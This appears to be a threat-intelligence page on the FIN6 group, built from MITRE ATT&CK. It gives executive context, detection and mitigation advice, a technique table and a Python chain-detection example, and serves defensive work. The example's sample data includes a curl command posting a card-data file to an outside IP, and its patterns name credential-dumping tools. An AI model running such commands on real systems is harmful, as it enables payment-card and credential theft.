G0037: FIN6
Analyst context for executives and security teams
FIN6 matters because ATT&CK describes it as a financially motivated group focused on stealing payment card data, with aggressive compromise of point-of-sale systems in hospitality and retail. The relationship data also links the group to credential theft, remote administration/execution tooling, discovery, exfiltration, backdoors, POS malware, and ransomware families, so leaders should treat this as more than a malware-name problem: it is a test of payment environment segmentation, Windows identity hygiene, incident response readiness, and evidence needed for payment-card and business-continuity assurance.
Executive priority
Prioritize FIN6-relevant coverage where payment processing, retail operations, hospitality operations, Active Directory, and Windows administration paths intersect. Useful leadership questions include: can we prove PoS systems are isolated from general corporate Windows access, can we detect credential dumping and remote movement before data theft or ransomware impact, and do we have audit-ready logs showing access to payment systems and sensitive local data? The ATT&CK relationships to Ryuk, LockerGoga, and Maze also make recovery readiness and ransomware decision-making relevant, especially for organizations where Windows enterprise disruption could affect physical operations.
Technical view
ATT&CK does not provide a FIN6-specific detection section, so defenders should build validation from the linked techniques and software. Focus on Windows credential access involving LSASS and NTDS, remote execution via PsExec/WMI/RDP, Active Directory reconnaissance with tools such as AdFind, command obfuscation, suspicious task/service naming, remote system and service discovery, local data collection, and unencrypted exfiltration paths. For PoS environments, validate monitoring for FrameworkPOS-like behavior and any unauthorized access to systems that process payment-card data. Treat dual-use tools such as PsExec, Cobalt Strike, Mimikatz, Windows Credential Editor, and AdFind as context-dependent signals requiring user, host role, command-line, and authentication correlation.
Likely telemetry
- Endpoint process creation, command-line, parent-child process, module, and script execution telemetry from Windows systems
- Authentication, RDP logon, privileged account use, and lateral movement records
- Domain controller and Active Directory telemetry, including access patterns relevant to NTDS and directory enumeration
- Service creation, scheduled task, WMI, and remote execution logs
- EDR or host telemetry for credential dumping indicators involving LSASS and password dumping tools
Detection direction
- Validate correlation across credential access, discovery, and lateral movement rather than relying on single tool-name alerts.
- Tune detections for dual-use administration tools by comparing activity against approved admin hosts, expected operators, maintenance windows, and normal command patterns.
- Look for chains such as directory discovery followed by credential access, RDP/PsExec/WMI use, local data access, or outbound transfer from unusual hosts.
- Ensure PoS and payment-segment telemetry is actually centralized; many programs have strong corporate endpoint visibility but weak coverage on payment systems.
- Review false positives around legitimate remote support, system administration, vulnerability scanning, and directory queries, but require strong justification for privileged activity touching payment or domain-control assets.
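The chain-and-tuning logic in the bullets above, written out as an added example that is not part of this page or of ATT&CK: it assumes process events arrive as (timestamp, host, command line) tuples, and the host names, approved-host list, maintenance window and command-line markers are all constructed stand-ins for the tools named on this page.

```python
"""Added example: correlate the chain above over constructed Windows process events."""
from datetime import datetime, timedelta
# Constructed, simplified markers for tool families named on this page; real detections
# key on hashes, signers, parent trees and authentication context, not substrings.
STAGES = {"discovery": ("adfind", "net group", "nltest"),
          "cred_access": ("wce.exe", "mimikatz"),
          "remote_exec": ("psexec", "wmic /node:", "mstsc"),
          "exfil": ("curl -x post", "invoke-webrequest -method post")}
# Tuning inputs (constructed): an approved admin host and its maintenance window.
APPROVED_ADMIN_HOSTS = {"ADMIN-JUMP01"}
MAINTENANCE = (datetime(2024, 5, 1, 22, 0), datetime(2024, 5, 2, 2, 0))
SAMPLE_EVENTS = [  # (timestamp, host, command line), constructed
    (datetime(2024, 5, 1, 13, 0), "POS-STORE12", "adfind.exe -f objectcategory=computer"),
    (datetime(2024, 5, 1, 13, 20), "POS-STORE12", "wce.exe"),
    (datetime(2024, 5, 1, 13, 45), "POS-STORE12", "psexec.exe \\\\POS-STORE13 cmd.exe"),
    (datetime(2024, 5, 1, 14, 5), "POS-STORE12", "curl -X POST -d @cards.txt http://203.0.113.7/up"),
    (datetime(2024, 5, 1, 23, 0), "ADMIN-JUMP01", "adfind.exe -f objectcategory=computer"),
    (datetime(2024, 5, 1, 23, 10), "ADMIN-JUMP01", "psexec.exe \\\\FS01 ipconfig"),
    (datetime(2024, 5, 1, 13, 0), "HR-WS07", "adfind.exe -f objectcategory=computer"),
    (datetime(2024, 5, 1, 13, 30), "HR-WS07", "mstsc /v:FS01"),
]
def classify(cmdline):
    """Return the chain stage index for a command line, or None if no marker matches."""
    c = cmdline.lower()
    for i, needles in enumerate(STAGES.values()):
        if any(n in c for n in needles):
            return i
    return None

def detect_chains(events, window=timedelta(hours=2), min_stages=3):
    """Hosts showing >= min_stages stages in chain order within `window` of the first one."""
    per_host = {}
    for ts, host, cmd in events:
        stage = classify(cmd)
        tuned_out = host in APPROVED_ADMIN_HOSTS and MAINTENANCE[0] <= ts <= MAINTENANCE[1]
        if stage is not None and not tuned_out:  # tuned_out: expected operator path, no alert
            per_host.setdefault(host, []).append((ts, stage))
    hits = {}
    for host, evs in per_host.items():
        evs.sort()
        for i, (t0, s0) in enumerate(evs):
            seen = {s0}
            for t, s in evs[i + 1:]:
                if t - t0 > window: break
                if s > max(seen):  # accept only forward progress along the chain
                    seen.add(s)
            if len(seen) >= min_stages:
                hits[host] = [list(STAGES)[s] for s in sorted(seen)]
                break
    return hits
```

The admin host is only tuned out while inside its maintenance window; the same activity outside that window, or from a host not on the approved list, would still surface.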
Mitigation priorities
- Start with segmentation and access control around PoS/payment systems, including strict administrative paths from corporate Windows environments.
- Reduce credential theft risk by hardening privileged access, limiting credential exposure on endpoints, and monitoring domain controller access.
- Constrain and govern remote administration channels such as RDP, WMI, and PsExec-style execution with logging, approval, and least privilege.
- Maintain tested incident response and recovery plans for ransomware scenarios reflected in the related software relationships.
- Improve egress monitoring and control for unencrypted exfiltration paths, especially from sensitive business and payment environments.
Analyst notes and limits
The strongest business reading is payment-card theft risk in retail and hospitality, expanded by ATT&CK relationships showing credential access, remote movement, backdoors, PoS malware, and ransomware tooling. This should drive a practical control review across payment segmentation, Active Directory, Windows endpoint monitoring, and recovery readiness rather than a narrow IOC exercise.
The FIN6 intrusion-set record does not specify platforms, tactics, labels, or official detection guidance. Platform and behavior direction above is derived from supplied relationships to ATT&CK software and techniques. Local exposure, current activity, vendor coverage, and whether FIN6-relevant behaviors are present in a specific environment require organization-specific evidence.
FIN6
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1560.003 | Archive via Custom Method Sub-technique | |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | FIN6 has targeted victims with e-mails containing malicious attachments. (Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1685 | Disable or Modify Tools | |
| Enterprise | T1087.002 | Domain Account Sub-technique | |
| Enterprise | T1059 | Command and Scripting Interpreter | |
| Enterprise | T1572 | Protocol Tunneling | |
| Enterprise | T1213.006 | Databases Sub-technique | FIN6 has collected schemas and user accounts from systems running SQL Server. (Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | FIN6 has used encoded PowerShell commands. (Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1059.007 | JavaScript Sub-technique | FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites. (Citation: Trend Micro FIN6 October 2019) |
| Enterprise | T1102 | Web Service | |
| Enterprise | T1005 | Data from Local System | FIN6 has collected and exfiltrated payment card data from compromised systems. (Citation: Trend Micro FIN6 October 2019) (Citation: RiskIQ British Airways September 2018) (Citation: RiskIQ Newegg September 2018) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1070.004 | File Deletion Sub-technique | |
| Enterprise | T1003.003 | NTDS Sub-technique | |
| Enterprise | T1134 | Access Token Manipulation | |
| Enterprise | T1068 | Exploitation for Privilege Escalation | |
| Enterprise | T1204.002 | Malicious File Sub-technique | FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts. (Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | |
| Enterprise | T1059.001 | PowerShell Sub-technique | |
| Enterprise | T1560 | Archive Collected Data | |
| Enterprise | T1553.002 | Code Signing Sub-technique | |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | |
| Enterprise | T1119 | Automated Collection | |
| Enterprise | T1018 | Remote System Discovery | |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.[1] |
| Enterprise | T1569.002 | Service Execution Sub-technique | |
| Enterprise | T1046 | Network Service Discovery | |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique | FIN6 has sent stolen payment card data to remote servers via HTTP POSTs. (Citation: Trend Micro FIN6 October 2019) |
| Enterprise | T1047 | Windows Management Instrumentation | |
| Enterprise | T1110.002 | Password Cracking Sub-technique | |
| Enterprise | T1555 | Credentials from Password Stores | FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP. (Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1095 | Non-Application Layer Protocol | FIN6 has used Metasploit Bind and Reverse TCP stagers. (Citation: Trend Micro FIN6 October 2019) |
| Enterprise | T1078 | Valid Accounts | |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | FIN6 has used Windows Credential Editor for credential dumping.[1][2] |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | FIN6 has used the Stealer One credential stealer to target web browsers. (Citation: Visa FIN6 Feb 2019) |
| Enterprise | T1074.002 | Remote Data Staging Sub-technique | |
Groups, software, and campaigns
S0381: FlawedAmmyy
FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[1]
S0632: GrimAgent
GrimAgent is a backdoor that has been used before the deployment of Ryuk ransomware since at least 2020; it is likely used by FIN6 and Wizard Spider.[1]
S0503: FrameworkPOS
FrameworkPOS is a point of sale (POS) malware used by FIN6 to steal payment card data from systems that run physical POS devices.[1]
S0284: More_eggs
More_eggs is a JScript backdoor used by Cobalt Group and FIN6. Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4.[1][2]
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0005: Windows Credential Editor
Windows Credential Editor is a password dumping tool.[1]
S0552: AdFind
S0029: PsExec
S0449: Maze
S0372: LockerGoga
LockerGoga is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.[1][2]
S0446: Ryuk
S0002: Mimikatz
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 4.0 | | Current bundle | 65d27d5cdb3e… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] FireEye FIN6 April 2016: FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024.
- [2] FireEye FIN6 Apr 2019: McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
- [3] Crowdstrike Global Threat Report Feb 2018: CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
- [4] Security Intelligence More Eggs Aug 2019: Villadsen, O. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
- [5] Camouflage Tempest (Citation: Microsoft Threat Actor Naming July 2023)
- [6] FIN6 (Citation: FireEye FIN6 April 2016)
- [7] ITG08 (Citation: Security Intelligence More Eggs Aug 2019)
- [8] Magecart Group 6 (Citation: Security Intelligence ITG08 April 2020)
- [9] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
- [10] Security Intelligence ITG08 April 2020: Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.
- [11] Skeleton Spider (Citation: Crowdstrike Global Threat Report Feb 2018)
- [12] TAAL (Citation: Microsoft Threat Actor Naming July 2023)
- [13] mitre-attack G0037
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.